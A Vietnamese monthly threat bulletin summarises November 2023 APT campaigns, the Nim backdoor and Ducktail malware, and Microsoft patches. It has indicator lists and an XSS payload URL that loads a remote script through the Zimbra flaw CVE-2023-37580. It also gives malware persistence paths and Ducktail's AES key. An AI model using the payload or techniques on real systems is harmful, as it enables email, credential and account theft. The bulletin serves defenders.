THÔNG TIN CÁC MỐI ĐE DỌA BẢO MẬT THÁNG 11 – 2023

  Hàng tháng, NCS sẽ tổng hợp các thông tin bảo mật về APT, Malware, CVEs và gói gọn nó vào trong một bài viết

1        Các mối đe dọa nâng cao – Advanced Threats

1.1      Nhóm tấn công sử dụng lỗ hổng 0-day tấn công vào các tổ chức

Nhóm phân tích mối đe dọa (TAG) của Google đã phát hiện các cuộc tấn công khai thác lỗ hổng 0-day nhắm vào máy chủ email Zimbra Collaboration, máy chủ email được nhiều tổ chức sử dụng để lưu trữ emai. TAG đã quan sát thấy bốn chiến dịch tấn công khai thác cùng một lỗi để đánh cắp dữ liệu email, thông tin xác thực của người dùng và authentication tokens. Các hoạt động này được ghi nhận xảy ra sau khi bản vá ban đầu được được công khai trên Github.

Lỗ hổng được sử dụng trong các cuộc tấn công là CVE-2023-37580 – reflected cross-site scripting (XSS) vulnerability, cho phép kẻ tấn công chèn các lệnh độc hại vào website.

https://mail.REDACTED[.]com/m/momoveto?st=acg”/><script src=”https://REDACTED/script.js”></script>//

Các chiến dịch được TAG ghi nhận như sau:

Chiến dịch 1: Khai thác được ghi nhận lần đầu nhằm đánh cắp email

Phát hiện ban đầu về lỗ hổng 0-day là một chiến dịch nhắm vào một tổ chức chính phủ ở Hy Lạp. Kẻ tấn công đã gửi email chứa các url khai thác tới nạn nhân, nếu nạn nhân click vào liên kết url sẽ tải xuống một famework sử dụng XSS để đánh cắp dữ liệu của người dùng như email và tệp đính kèm đồng cấu hình tự động chuyển tiếp đến địa chỉ email do kẻ tấn công kiểm soát.

https://obsorth[.]opwtjnpoc[.]ml/pQyMSCXWyBWJpIos.js

Chiến dịch 2: Winter Vivern (UNC4907)

TAG xác định được số lượng khai thác nhắm mục tiêu vào các tổ chức chính phủ ở Moldova và Tunisia, mỗi url chứa một địa chỉ email chính thức cho các tổ chức thuộc chính phủ. TAG cho rằng các hoạt động khai thác tấn công này thuộc về nhóm APT Winter Vivern (UNC4907).

https://applicationdevsoc[.]com/zimbraMalwareDefender/zimbraDefender.js

https://applicationdevsoc[.]com/tndgt/auth.js

Chiến dịch 3: Khai thác lỗ hổng nhằm lừa đảo chiếm đoạt thông tin xác thực

Nhóm tấn công đã khai thác lỗ hổng trong chiến dịch lừa đảo nhằm lấy thông tin đăng nhập của một tổ chức chính phủ ở Việt Nam. URL được trỏ đến một trang web lừa đảo được thiết kế như một trang đăng nhập. Thông tin đánh cắp được sẽ được lưu trữ trên một trang web chính thức của chính phủ (được cho là đã bị chiếm quyền điều khiển)

Chiến dịch 4: Khai thác lỗ hổng nhằm đánh cắp authentication token

Nhóm tấn công sử dụng lỗ hổng nhắm mục tiêu vào một tổ chức chính phủ ở Pakistan, được sử dụng để đánh cắp Zimbra authentication token. Token bị đánh cắp sẽ được chuyển tới ntcpk[.]org.

Indicators of compromise (IoCs)

https://obsorth.opwtjnpoc[.]ml/pQyMSCXWyBWJpIos.js

https://applicationdevsoc[.]com/zimbraMalwareDefender/zimbraDefender.js

https://applicationdevsoc[.]com/tndgt/auth.js

ntcpk[.]org

1.2      Các hoạt động tấn công vào các quốc gia thuộc khu vực Đông Nam Á từ Trung Quốc

Palo Alto ghi nhận các nhóm tấn công từ Trung Quốc có các hành vi tấn công khai thác vào các nước thuộc khu vực Đông Nam Á, cụ thể là Philippines và Campuchia.

Stately Tauruscác chiến dịch tấn công nhắm tới Philippines

Nhóm tấn công có tên Stately Taurus (hay còn gọi là Mustang Panda, Bronze President, Red Delta, Luminous Moth, Earth Preta và Camaro Dragon) nhằm mục tiêu vào các thực thể ở Nam Thái Bình Dương, bao gồm cả chính phủ Philippines. Trong chiến dịch, nhóm tấn công tận dụng phần mềm hợp pháp bao gồm Solid PDF Creator và SmadavProtect (giải pháp chống virus có trụ sở tại Indonesia) để tải các tệp tin độc hại. Ngoài ra nhóm cũng cấu hình các phần mềm độc hại để mạo danh các truy cập hợp pháp của Microsoft cho các kết nối lệnh và kiểm soát (C2).

Chiến dịch 1:

Nhóm tấn công sử dụng tệp tin được lưu trữ trên Google Drive có tên 230728 meeting minutes.zip, bên trong file nén có file thực thi cùng tên (file hợp pháp của phần mềm Solid PDF Creator đã được đổi tên) và một tệp tin DLL ẩn SolidPDFCreator.dll. DLL nãy sẽ được gọi khi thực thi file .exe. DLL thực hiện tạo kết nối tới máy chủ C2 tại địa chỉ 45.121.146[.]113

Chiến dịch 2:

Gần giống như chiến dịch 1, file zip có tên NUG’s Foreign Policy Strategy.zip, bên trong có 2 tệp tin exe cùng tên và DLL SolidPDFCreator.dll

Ngoài ra, tệp tin cũng có một đường dẫn ẩn chứa 3 tệp tin errordetails, SmadavProtect32.exe và Smadhook32c.dll

Khi DLL SolidPDFCreator.dll được thực thi, nó sao chép 3 tệp tin errordetails, SmadavProtect32.exe và Smadhook32c.dll và cấu hình registry key tại đường dẫn  HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\AHealthDB\SmadavProtect32.exe

SmadavProtect32.exe là file hợp pháp của phần mềm antivirus của Indonesia SmadAV. Khi thực thi, nó sẽ gọi tới SmadHook32c.dll nhằm tạo kết nối tới máy chủ C2 45.121.146[.]113.

Chiến dịch 3:

Tương tự như cấu trúc file ở chiến dịch đầu tiên, tệp tin nén có tên Labor Statement.zip, bên trong tệp tin nén bao gồm một file exe cùng tên và một tệp tin DLL ẩn. DLL thực hiện tạo kết nối tới máy chủ C2 tại địa chỉ 45.121.146[.]113 như 2 chiến dịch trước.

Địa chỉ IP 45.121.146[.]113 được liên kết tới nhóm Stately Taurus trong một loạt chiến dịch vào tháng 06 2023. Kẻ tấn công tiếp tục tận dụng cơ sở hạ tầng này trong thời gian gần đây, một điểm đáng chú ý là nhóm tấn công giả mạo lưu lượng truy cập hợp pháp của Microsoft thông qua POST request tới địa chỉ wcpstatic.microsoft[.]com. Một số kết nối tới máy chủ C2 được bắt nguồn từ cơ sở hạ tầng của chính phủ Philippines.

Indicators of Compromise

Stately Taurus Samples

bebde82e636e27aa91e2e60c6768f30beb590871ea3a3e8fb6aedbd9f5c154c5

24c6449a9e234b07772db8fdb944457a23eecbd6fbb95bc0b1398399de798584

ba7c456f229adc4bd75bfb876814b4deaf6768ffe95a03021aead03e55e92c7c

969b4b9c889fbec39fae365ff4d7e5b1064dad94030a691e5b9c8479fc63289c

3597563aebb80b4bf183947e658768d279a77f24b661b05267c51d02cb32f1c9

d57304415240d7c08b2fbada718a5c0597c3ef67c765e1daf4516ee4b4bdc768

54be4a5e76bdca2012db45b1c5a8d1a9345839b91cc2984ca80ae2377ca48f51

2b05a04cd97d7547c8c1ac0c39810d00b18ba3375b8feac78a82a2f9a314a596

C2:

45.121.146[.]113

URL:

hxxps://drive.google[.]com/uc?id=1QLIQXP-s42TtZsONsKLAAtOr4Pdxljcu

Chiến dịch tấn công khác nhắm tới Campuchia

Nhóm tấn công APT khác của Trung Quốc giả mạo dịch vụ sao lưu trên cloud (cloud backup services) nhắm mục tiêu tới Campuchia. Việc ghi nhận này trên việc phát hiện có ít nhất 24 tổ chức chính phủ thuộc các nhóm ngành như quốc phòng, bầu cử, quyền con người, tài chính quốc gia, viễn thông, v.v… thuộc Campuchia có các kết nối mạng tới cơ sở hạ tầng của nhóm tấn công trong nhiều tháng

Cơ sở hạ tầng dưới đây liên quan đến chứng chỉ SSL độc hại, được sử dụng bởi 6 máy chủ trên 6 địa chỉ IP khác nhau, mỗi máy chủ sử dụng thêm một số subdomain liên kết tới 6 domain. Các domain này mạo danh là dịch vụ lưu trữ đám mây. Thông tin chứng chỉ SSL như sau:

Subject Full Name C=US,ST=Some-State,O=Internet Widgits Pty Ltd,CN=10.200.206.100
Issuer Full Name C=US,ST=Some-State,O=Internet Widgits Pty Ltd,CN=COM
Serial Number 15007560845348164646
SHA1 Hash B8CFF709950CFA86665363D9553532DB9922265C
Valid From 2017-11-23
Valid To 2027-11-21

 

IP Address Target Port Domain(s)
165.232.186[.]197 80, 443, 4433

 

api.infinitycloud[.]info

connect.infinitycloud[.]info

ns.infinitycloud[.]info

167.71.226[.]171 80, 81, 82, 443, 769, 4433, 8086, 8089 file.wonderbackup[.]com

connect.infinitybackup[.]net

share.infinitybackup[.]net

sync.wonderbackup[.]com

104.248.153[.]204 82, 443

 

update.wonderbackup[.]com

login.wonderbackup[.]com

ns1.infinitybackup[.]net

143.110.189[.]141

 

443 mfi.teleryanhart[.]com

ads.teleryanhart[.]com

172.105.34[.]34

 

8081, 8087, 8443, 8888

 

jlp.ammopak[.]site

kwe.ammopak[.]site

lxo.ammopak[.]site

dfg.ammopak[.]site

fwg.ammopak[.]site

194.195.114[.]199

 

8080, 8443, 9200

 

connect.clinkvl[.]com

 

Indicators of Compromise

Domains

api.infinitycloud[.]info

connect.infinitycloud[.]info

ns.infinitycloud[.]info

connect.infinitybackup[.]net

ns1.infinitybackup[.]net

share.infinitybackup[.]net

file.wonderbackup[.]com

login.wonderbackup[.]com

sync.wonderbackup[.]com

update.wonderbackup[.]com

ads.teleryanhart[.]com

mfi.teleryanhart[.]com

dfg.ammopak[.]site

fwg.ammopak[.]site

jlp.ammopak[.]site

kwe.ammopak[.]site

lxo.ammopak[.]site

connect.clinkvl[.]com

IP Addresses

165.232.186[.]197

167.71.226[.]171

104.248.153[.]204

143.110.189[.]141

172.105.34[.]34

194.195.114[.]199

SSL Certificate SHA-1 Fingerprint

B8CFF709950CFA86665363D9553532DB9922265C

1.3      Octo Tempest – nhóm tấn công hoạt động với động cơ tài chính vào nhiều nhóm ngành nghề

Microsoft theo dõi các hoạt động và các chiến dịch liên quan đến nhóm tấn công Octo Tempest. Nhóm tấn công nổi tiếng trong việc có các chiến dịch lừa đảo sử dụng kỹ thuật adversary-in-the-middle (AiTM) phishing, lừa đảo hoán đổi sim (SIM swapping) để chiếm quyền điều khiển các tổ chức trên toàn cầu nhằm mục đích tống tiền, lần đầu được phát hiện vào đầu năm 2022 nhắm mục tiêu vào các tổ chức kinh doanh và viễn thông di động cung cấp các dịch vụ hoán đổi sim. Octo Tempest kiếm tiền từ các hoạt động xâm nhập vào năm 2022 bằng cách bán dịch vụ hoán đổi SIM cho tội phạm khác hoặc thực hiện chiếm đoạt tài khoản để đánh cắp tiền điện tử của nạn nhân

Sang đầu năm 2023, Octo Tempest mở rộng phạm vi tấn công sang các tổ chức thuộc lĩnh vực cáp viễn thông, email và công nghệ. Trong giai đoạn này, Octo Tempest bắt đầu kiếm tiền từ các hành vi xâm nhập bằng cách tống tiền các tổ chức sử dụng các dữ liệu đã đánh cắp được trước đó. Giữa năm 2023, nhóm tấn công khai thác lỗ hổng trên các máy chủ Vmware ESXi và triển khai mã độc tống tiền – ransomware ALPHV/BlackCat, phạm vi tấn công cũng mở rộng sang các lĩnh vực gaming, khách sạn, sản phẩm tiêu dùng, dịch vụ tài chính, v.v… Gần đây, Microsoft ghi nhận Octo Tempest sử dụng nhiều kỹ thuật – chiến thuật nâng cao (TTP) trong các cuộc tấn công:

Initial access

Octo Tempest sử dụng các cuộc tấn công kỹ nghệ xã hội (social engineering) nhắm vào các quản trị viên, nhóm tấn công thực hiện nghiên cứu về tổ chức và xác định đầy đủ thông tin về nạn nhân để thực hiện mạo danh lừa quản trị viên thực hiện đặt lại mật khẩu và đặt lại các phương thức xác thực đa yếu tố (MFA).

Octo Tempest có được quyền truy cập ban đầu vào tổ chức bằng một trong số các phương pháp sau:

  • Kỹ nghệ xã hội
  • Lừa người dùng cài các tiện ích cho truy cập từ xa
  • Điều hướng đến một trang web giảo mạo được thiết kế như trang đăng nhập
  • Xóa các thông báo FIDO2 của nạn nhân
  • Giả mạo người dùng trong tổ chức, yêu cầu quản trị viên hỗ trợ đặt lại mật khẩu hoặc thêm/thay đổi các yếu tố xác thực
  • Mua thông tin xác thực của người dùng trên thị trường underground
  • SMS phishing lừa người dùng truy cập tới đường dẫn được thiết kế là trang web giả mạo đăng nhập
  • Lừa đảo hoán đổi sim

Reconnaissance and discovery

Octo Tempest sử dụng các thông tin xác thực đã có được thực hiện tìm kiếm thông tin liên quan đến kiến ​​trúc mạng, giới thiệu nhân viên, phương pháp truy cập từ xa, chính sách mật khẩu và kho thông tin xác thực. Tìm kiếm thông tin quyền truy cập và tài nguyên trên môi trường đám mây, kho lưu trữ mã, cơ sở hạ tầng quản lý máy chủ và sao lưu, v.v.

Công cụ sử dụng:

  • PingCastle và ADRecon thực hiện thu thập thông tin về Active Directory
  • Advanced IP Scanner thu thập thông tin mạng của tổ chức
  • Govmomi Go library nhằm liệt kê các API vCenter
  • PureStorage FlashArray PowerShell

Privilege escalation and credential access

Sử dụng quyền truy cập hiện có thực hiện trao đổi SIM hoặc thiết lập chuyển tiếp. Octo Tempest sẽ cấu hình lại mật khẩu cho tài khoản của người dùng sau khi giành được quyền kiểm soát số điện thoại.

Sử dụng kỹ nghệ xã hội – gọi tới bộ phận hỗ trợ hoặc quản trị viên để đặt lại mật khẩu hoặc thay đổi/thêm các mã thông báo/yếu tố xác thực đa yếu tố.

Masquerading and collection for escalation

  • Sửa đổi chính sách truy cập hoặc sử dụng MicroBurst để có quyền truy cập vào kho lưu trữ thông tin xác thực
  • Sử dụng các công cụ mã nguồn mở: Mimikatz, Hekatomb, Lazagne, gosecretsdump, smbpasswd.py, LinPEAS, ADFSDump
  • Sử dụng tiện ích mở rộng VMAccess để đặt lại mật khẩu hoặc sửa đổi cấu hình của Azure
  • Tạo snapshots virtual domain controller để tải xuống và giải nén NTDS.dit
  • Gán role hoặc quyền truy cập

Defense evasion

Octo Tempest chiếm các tài khoản bảo mật nhằm tắt các sản phẩm và tính năng bảo mật. Ngoài ra, nhóm cũng thực hiện sửa đổi các rule của mailbox.

  • Sử dụng công cụ mã nguồn mở như Privacy.sexy Framework để vô hiệu hóa các sản phẩm bảo mật
  • Cấu hình lại thông tin về vị trí đáng tin cậy trong Conditional Access Policies để mở rộng khả năng truy cập

Persistence

Để duy trì quyền truy cập, Octo Tempest cài đặt nhiều công cụ RMM hợp pháp và thực hiện các sửa đổi cấu hình mạng nhằm cho phép truy cập. Sử dụng reverse shell trên cả hai môi trường Windows và Linux tạo kết nối reverse shell tới cùng cơ sở hạ tầng C2 của kẻ tấn công như công cụ RMM đã triển khai. Ngoài ra, Octo Tempest cũng chiếm quyền điều khiển của VMware ESXi, cài đặt Bedevil backdoor Linux mã nguồn mở, sau đó khởi chạy các tập lệnh VMware Python để chạy các câu lệnh tùy ý.

  • Sử dụng công cụ mã nguồn mở: ScreenConnect, FleetDeck, AnyDesk, RustDesk, Splashtop, Pulseway, TightVNC, LummaC2, Level.io, Mesh, StrategicRMM, Tailscale, Ngrok, WsTunnel, Rsocx và Socat.
  • Triển khai các máy ảo Azure để cho phép truy cập từ xa thông qua cài đặt RMM hoặc sửa đổi các tài nguyên hiện có thông qua Azure serial console.
  • Bổ sung các phương pháp MFA cho người dùng
  • Việc sử dụng công cụ tunneling Twingate

Data theft, extortion, and ransomware

Động cơ chính của nhóm là tài chính, các hành vi khác nhau như đánh cắp tiền điện từ, đánh cắp dữ liệu để tống tiền và triển khai ransomware lại tùy thuộc vào từng ngành nghề lĩnh vực.

  • Sử dụng các dịch vụ của bên thứ ba như FiveTran để trích xuất các bản sao của cơ sở dữ liệu dịch vụ có giá trị cao, chẳng hạn như SalesForce và ZenDesk thông qua API
  • Lọc các tệp PST của hòm thư và chuyển tiếp thư đến các hòm thư bên ngoài

2        Malware

2.1      Backdoor được viết bằng ngôn ngữ Nim được sử dụng trong các chiến dịch tình báo vào các nước thuộc khu vực Nam Á

Gần đây, trong quá trình theo dõi trung tâm tình báo mối đe dọa QiAnXin đã phát hiện các mẫu độc hại nhắm mục tiêu vào Bhutan. Thông qua lừa người dùng mở tài liệu độc hại nhằm thực thi backdoor được viết bằng Nim. Dựa trên đặc điểm trong backdoor, nhóm phân tích liên kết đến các mẫu mã độc tấn công vào Nepal và Myanmar

MD5 File name Type
7bea8ea83d5b4fe5985172dbb4fa1468 GlobalLeadershipProgram1.docm Macro document
04e9ce276b3cd75fc2b20b9b33080f7e Seniority_List.docm Encrypted macro document [5]

 

(Password: 20221114PROM )

92612dc223e8f0656512cd882d66f78b svchost.exe Nim backdoor
c2184d8fd3dd3df9fd6cf7ff8e32a3a4 sihosts.exe Nim backdoor
b2ab01d392d7d20a9261870e709b18d7 conhost.exe Nim backdoor
30ddd9ebe00f34f131efcd8124462fe3 sihosts.exe Nim backdoor

 

Tài liệu chứa marco sẽ được kích hoạt khi nạn nhân click vào Enable Editing, marco chỉ có nhiệm vụ drop các file để thực thi về sau.

Hàm Sch_task() sẽ thực thi drop file VBS có tên OCu3HBg7gyI9aUaB.vbs tại đường dẫn “%AppData%\Microsoft\Windows\Start Menu\Programs\Startup”.

Hàm Hide_cons() thực hiện drop file tại đường dẫn “%LocalAppData%\skriven.vbs”.

Hàm Read_shell() trích xuất dữ liệu zip từ văn bản của object UserForm1.TextBox1 từ document và lưu dưới dạng “%LocalAppData%\Microsoft\svchost.zip”.

Hàm Vb_chain() drop file tại đường dẫn “%LocalAppData%\8lGghf8kIPIuu3cM.bat”. Cuối cùng, gọi hàm ActiveDocument.Shapes hai lần để loại layer “enabled macro” và hiển thị nội dung file decoy

OCu3HBg7gyI9aUaB.vbs được cấu hình trong đường dẫn Startup, khi khởi chạy nó thực hiện khởi chạy 8lGghf8kIPIuu3cM.bat

skriven.vbs chạy file được chỉ định với các tham số, file bat được thực thi ở chế độ ẩn

8lGghf8kIPIuu3cM.bat thực hiện trích xuất thêm một số các file, các file này sẽ được gọi lần lượt. Thông tin đường dẫn và nhiệm vụ của các file như sau:

  • %LocalAppData%\unzFile.vbs: Tạo file unz.vbs
  • %LocalAppData%\2L7uuZQboJBhTERK.bat: Gọi tới lần lượt 2 file tại đường dẫn %LocalAppData%\unzFile.vbs và %LocalAppData%\2BYretPBD4iSQKYS.bat
  • %LocalAppData%\2BYretPBD4iSQKYS.bat: Gọi tới unz.vbs giải nén file svchost.zip và tạo gọi tới file %LocalAppData%\d.bat
  • %LocalAppData%\d.bat: Lập lịch cho file có tên svchost.exe (được giải nén từ svchost.zip) và gọi tới %LocalAppData%\e.bat
  • %LocalAppData%\e.bat: Xóa bỏ tất cả các script được drop từ 8lGghf8kIPIuu3cM.bat

Nim backdoor

File svchost.zip có chứa file svchost.exe được lập lịch thực thi bởi script d.bat như mô tả ở trên. File có chứa một số chuỗi đặc biệt:

MD5 String
92612dc223e8f0656512cd882d66f78b E:\\Store\\MACRO\\BT\\bt_apache.nim

 

c2184d8fd3dd3df9fd6cf7ff8e32a3a4 E:\\Store\\MACRO\\NP\\np_apache.nim
b2ab01d392d7d20a9261870e709b18d7 E:\\Store\\macro\\mm\\mm_apache.nim
30ddd9ebe00f34f131efcd8124462fe3 C:\\Users\\ProCoder\\Desktop\\Store\\MACRO\\MM\\mm_apache.nim

 

Backdoor thực hiện kiểm tra môi trường đang được thực thi, bao gồm:

  • Kiểm tra xem các tiến trình hiện tại có các tiến trình nào liên quan đến phân tích, debug hay được sử dụng trong quá trình phân tích mã độc

  • Kiểm tra thời gian thực thi, trong mẫu 30ddd9ebe00f34f131efcd8124462fe3, mã độc cũng thực hiện kiểm tra số lượng CPU và cách thức di chuyển của chuột

Sau khi thực hiện kiểm tra môi trường, mã độc thực hiện sao chép một số địa chỉ URL của máy chủ C2

Thực thi câu lệnh “cmd /c hostname” để thu thập thông tin máy chủ, sau đó sử dụng hàm có tên gốc là bakery__bt95apache để mã hóa và gửi GET request tới máy chủ

Sau khi nhận được dữ liệu phản hồi thì C2, mã độc sẽ thực hiện giải mã và ghép với chuỗi cmd /c để thực thi các câu lệnh. Kết quả sẽ được gửi lại máy chủ C2 thông qua GET request. Dữ liệu lớn có thể được phân mảnh thành các group 100 bytes trước khi gửi đi

Ngoài URL, máy chủ C2 cũng được chọn ngẫu nhiên, dữ liệu được sử dụng với một số trường sau:

(Field) description
id = Hostname mã hóa theo base64
/session= Số thứ tự của dữ liệu đã được mã hóa, tính từ 0
?/value= Dữ liệu đã mã hóa theo base64
/return=true none

 

Indicators of Compromise

MD5

7bea8ea83d5b4fe5985172dbb4fa1468

04e9ce276b3cd75fc2b20b9b33080f7e

92612dc223e8f0656512cd882d66f78b

c2184d8fd3dd3df9fd6cf7ff8e32a3a4

b2ab01d392d7d20a9261870e709b18d7

30ddd9ebe00f34f131efcd8124462fe3

C&C

dns-mofgovbt.ddns.net

mail-mofgovbt.hopto.org

microsoftupdte.redirectme.net

updatemanager.ddns.net

mx2.nepal.gavnp.org

cloud.nitc.gavnp.org

dns.nepal.gavnp.org

mx1.nepal.gavnp.org

asean-ajp.myftp.org

dof-govmm.sytes.net

mail-mohs.servehttp.com

drsasa.hopto.org

pdf-shanstate.serveftp.com

myanmar-apn.serveftp.com

mytel-mm.servehttp.com

pdf-shanstate.redirectme.net

URL

hxxp://dns-mofgovbt.ddns.net/update/

hxxp://mail-mofgovbt.hopto.org/update/

hxxp://microsoftupdte.redirectme.net/update/

hxxp://updatemanager.ddns.net/update/

hxxp://mx2.nepal.gavnp.org/mail/AFA/

hxxp://cloud.nitc.gavnp.org/mail/AFA/

hxxp://dns.nepal.gavnp.org/mail/AFA/

hxxp://mx1.nepal.gavnp.org/mail/AFA/

hxxp://asean-ajp.myftp.org/MOFA/

hxxp://dof-govmm.sytes.net/MOFA/

hxxp://mail-mohs.servehttp.com/MOFA/

hxxp://drsasa.hopto.org/MOFA/

hxxp://pdf-shanstate.serveftp.com/MOFA/

2.2      Ducktail – phần mềm độc hại được sử dụng bởi các nhóm tội phạm mạng tại Việt Nam

Ducktail là họ phần mềm độc hại đã hoạt động từ nửa cuối năm 2021 và nhằm mục đích đánh cắp tài khoản doanh nghiệp trên Facebook, các báo cáo đều quy cho các cuộc tấn công này đến từ Việt Nam. Các mẫu mã độc được upload trên VirusTotal gần đây đều nhắm mục tiêu vào các chuyên gia marketing, với đặc điểm mới sử dụng Delphi làm ngôn ngữ lập trình

Nhóm tấn công sử dụng các hình ảnh cùng file giả mạo PDF với phần mở rộng là .exe. Được gửi qua email dưới tên của một công ty quần áo lớn

Nếu người dùng thực hiện mở tệp tin PDF giả mạo, tệp tin đọc lại sẽ lưu file Powershell có tên param.ps1 và giải mã file PDF có tên INDITEX2.pdf vào đường dẫn C:\Users\Public và mở file để lừa người dùng

Mã độc cũng tạo lưu DLL độc hại có libEGL.dll to C:\Users\Public\Libraries\ và thực thi. Khi thực thi, nó sẽ tìm kiếm các file LNK tại các đường dẫn

  • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\,
  • C:\ProgramData\Microsoft\Internet Explorer\Khởi chạy nhanh\Người dùng đã ghim\TaskBar\

Một số chuỗi trong binary được mã hóa bằng thuật toán AES  mode CBC với khóa “gnghfn47n467n43b” và vector khởi tạo IV “ dakfhskljh92384h”

Ngoài việc khởi chạy DLL, mã độc cũng thực hiện lưu extension độc hại trong Chrome tại đường C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\fjoaledfpmneenckfbpdfhkmimnjocfa. Extension này giả mạo Google Docs Offline

Extension này gọi tới các script bị obfuscate gây khó khăn trong quá trình phân tích

Script có nhiệm vụ chính gửi thông tin đến các tab của trình duyệt đến máy chủ C2, nếu phát hiện các URL liên quan đến facebook, nó sẽ kiểm tra và cố gắng đánh cắp các tài khoản liên quan đến quảng cáo và business account. Ngoài ra, extension cũng đánh cắp cookie và thông tin chi tiết về tài khoản mà nạn nhân đăng nhập trên thiết bị. Để bỏ qua xác thực 2 yếu tố (2FA), đoạn script sử dụng các API của Facebook và dịch vụ 2fa[.]live của Việt Nam, cho phép cung cấp các công cụ hỗ trợ khác nhau để tạo one-time access code. Thông tin đánh cắp sẽ được gửi tới máy chủ C2 được đăng ký tại Việt Nam

Indicators of Compromise

Hash

c82b959d43789d3dbf5115629c3c01fa8dd599fbec36df0f4bc5d0371296545a

2b3decf08bf9223fb3e3057b5a477d35e62c0b5795a883ceaa9555ca7c28252f

69257876e2ec5bdbe7114d6ce209f13afbfddb2af0006a6d17e6e91578966870

da13db80b0f3c25b512a1692494f303eff1ff1778a837208f79e2f3c81f8192e

bde696a0ae901864716320e3111d5aa49cba3b1d9375dce2903f7433a287b2f2

04dd228d0b088c4116b503c31de22c1746054226a533286bec3a3d0606d73119

89f016d32707f096cc8daf674e5a9fc2ba6cf731d610f5303d997fc848645788

7da7ca7fcbc6e8bc22b420f82ae5756ecd3ad094b8ebcbd5a78a2362eb87b226

655a8ea3bc1baff01639dcdc43a294f8a5dc622e543d8f51e9d51c6eaaae6f6e

1117a93b4b4b78e4d5d6bd79f5f0e04926759558218df30e868464f05bf1bd3d

554353cda0989c3a141c2ab0d0db06393e4f3fd201727e8cf2ed8d136f87d144

b9a984383a5825868c23bc3afdc70e3af2a56d26d002431940d2429c8e88ace9

c6ae36e28668c6132da4d08bca7ceb13adf576fa1dbdb0a708d9b3b0f140dd03

d03e1a0fce0b112bba4d56380c8d1be671845dd3ed90ec847635ba6015bad84d

ab95f377bf7ae66d26ae7d0d56b71dec096b026b8090f4c5a19ac677a9ffe047

f59e2672f43f327c9c84c057ad3840300a2cd1db1c536834f9e2531c74e5fd1c

ba8eb1a7f18e4cfca7dd178de1546d42ffb50028c8f3f7ba6551f88c11be75db

06afd110d91419ece0114a7fdeaeba4e79fbc9f2a0450da8b4f264e4ae073a26

64f6cbe9adf91bc4ed457c79643d764a130b0d25364817c8b6da17b03ff91aa7

bdf8dea28f91adcba7780a26951abc9c32a4a8c205f3207fd4f349f6db290da7

d4f10bd162ee77f4778ecc156921f5949cd2d64aab45b31d6050f446e59aed5a

bdf8dea28f91adcba7780a26951abc9c32a4a8c205f3207fd4f349f6db290da7

C&C

dauhetdau[.]com

motdanvoi20232023[.]com

voiconprivatesv2083[.]com

cavoisatthu2023asd[.]com

3        CVE và các khuyến nghị bảo mật

3.1      Microsoft Patch Tuesday – November 2023

Trong tháng 11, Microsoft đã phát hành các bản vá cho 63 CVE mới trong các sản phẩm của Microsoft Windows và Windows Components; Exchange Server; Office và Office Components; ASP.NET và .NET Framework; Azure; Mariner; Microsoft Edge (Chromium-based), Visual Studio, và Windows Hyper-V. Trong đó có 3 lỗ hổng được đánh giá mức độ Nghiêm trọng, 56 lỗ hổng được đánh giá là Important. Dưới đây là các CVE nổi bật:

3.1.1       CVE-2023-2023-36033 – Lỗ hổng leo thang đặc quyền trong Windows Desktop Manager | Windows DWM Core Library Elevation of Privilege Vulnerability

CVSS: 7.8/10

Mô t: Tồn tại lỗ hổng trong Windows Desktop Manager (DWM) cho phép kẻ tấn công leo thang đặc quyền lên quyền SYSTEM. Lỗ hổng được Microsoft ghi nhận đang được các nhóm tấn công lợi dụng khai thác.

Phiên bn nh hưởng:

Windows Server 2022, 23H2 Edition (Server Core installation)

Windows 11 Version 23H2 for x64-based Systems

Windows 11 Version 23H2 for ARM64-based Systems

Windows 10 Version 22H2 for 32-bit Systems

Windows 10 Version 22H2 for ARM64-based Systems

Windows 10 Version 22H2 for x64-based Systems

Windows 11 Version 22H2 for x64-based Systems

Windows 11 Version 22H2 for ARM64-based Systems

Windows 10 Version 21H2 for x64-based Systems

Windows 10 Version 21H2 for ARM64-based Systems

Windows 10 Version 21H2 for 32-bit Systems

Windows 11 version 21H2 for ARM64-based Systems

Windows 11 version 21H2 for x64-based Systems

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows Server 2019 (Server Core installation)

Windows Server 2019

Windows 10 Version 1809 for ARM64-based Systems

Windows 10 Version 1809 for x64-based Systems

Windows 10 Version 1809 for 32-bit Systems

Khuyến nghị: Cài đặt cập nhật bản vá theo hướng dẫn của hãng:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36033

3.1.2       CVE-2023-36036 – Lỗ hổng leo thang đặc quyền | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability.

CVSS: 7.8/10

Mô t: Windows Cloud Files Filter Driver được sử dụng để quản lý và hỗ trợ các hoạt động liên quan đến các tệp tin được lưu trữ trên cloud. Khai thác thành công lỗ hổng cho phép kẻ tấn công chiếm được quyền SYSTEM. Lỗ hổng được Microsoft ghi nhận đang được các nhóm tấn công lợi dụng khai thác.

Phiên bản ảnh hưởng:

Windows 11 Version 23H2 for x64-based Systems

Windows Server 2022, 23H2 Edition (Server Core installation)

Windows 11 Version 23H2 for ARM64-based Systems

Windows Server 2012 R2 (Server Core installation)

Windows Server 2012 R2

Windows Server 2012 (Server Core installation)

Windows Server 2012

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2016 (Server Core installation)

Windows Server 2016

Windows 10 Version 1607 for x64-based Systems

Windows 10 Version 1607 for 32-bit Systems

Windows 10 for x64-based Systems

Windows 10 for 32-bit Systems

Windows 10 Version 22H2 for 32-bit Systems

Windows 10 Version 22H2 for ARM64-based Systems

Windows 10 Version 22H2 for x64-based Systems

Windows 11 Version 22H2 for x64-based Systems

Windows 11 Version 22H2 for ARM64-based Systems

Windows 10 Version 21H2 for x64-based Systems

Windows 10 Version 21H2 for ARM64-based Systems

Windows 10 Version 21H2 for 32-bit Systems

Windows 11 version 21H2 for ARM64-based Systems

Windows 11 version 21H2 for x64-based Systems

Windows Server 2022 (Server Core installation)

Windows Server 2022

Windows Server 2019 (Server Core installation)

Windows Server 2019

Windows 10 Version 1809 for ARM64-based Systems

Windows 10 Version 1809 for x64-based Systems

